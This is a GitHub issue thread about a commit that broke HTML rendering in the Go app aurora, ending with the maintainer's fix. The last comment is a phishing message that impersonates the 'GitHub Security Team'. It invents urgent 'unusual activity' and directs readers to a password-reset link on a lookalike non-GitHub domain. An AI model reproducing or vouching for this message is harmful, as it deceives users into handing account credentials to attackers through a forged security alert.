### ISSUE TITLE
Broken Commit - HTML Rendering

### ISSUE THREAD

**Issue by GeertHauwaerts** [xuri/aurora#39]
**Description**

The commit a935e08f81115dec77ef516a7b85ca72b0a43675 breaks HTML rendering.

**Steps to reproduce the issue:**

1. `go build/go get`
2. `./aurora`
3. Open the app, click on a tube

**Describe the results you received:**

I receive escaped HTML output, (`&nbsp`, `&lt;` etc)

**Describe the results you expected:**

A pretty rendered page ;)

**Output of `go version`:**

```
go version go1.13.8 linux/amd64
```

**Aurora version or commit ID:**

```
a935e08f81115dec77ef516a7b85ca72b0a43675
```

**Environment details (OS, physical, etc.):**

```
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
```

**Remarks / Fix:**

I revered back to the commit before that one, and then it works.

**Comment by xuri** [comment]
Thanks for your feedback, I have fixed this please try to upgrade the master branch code.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
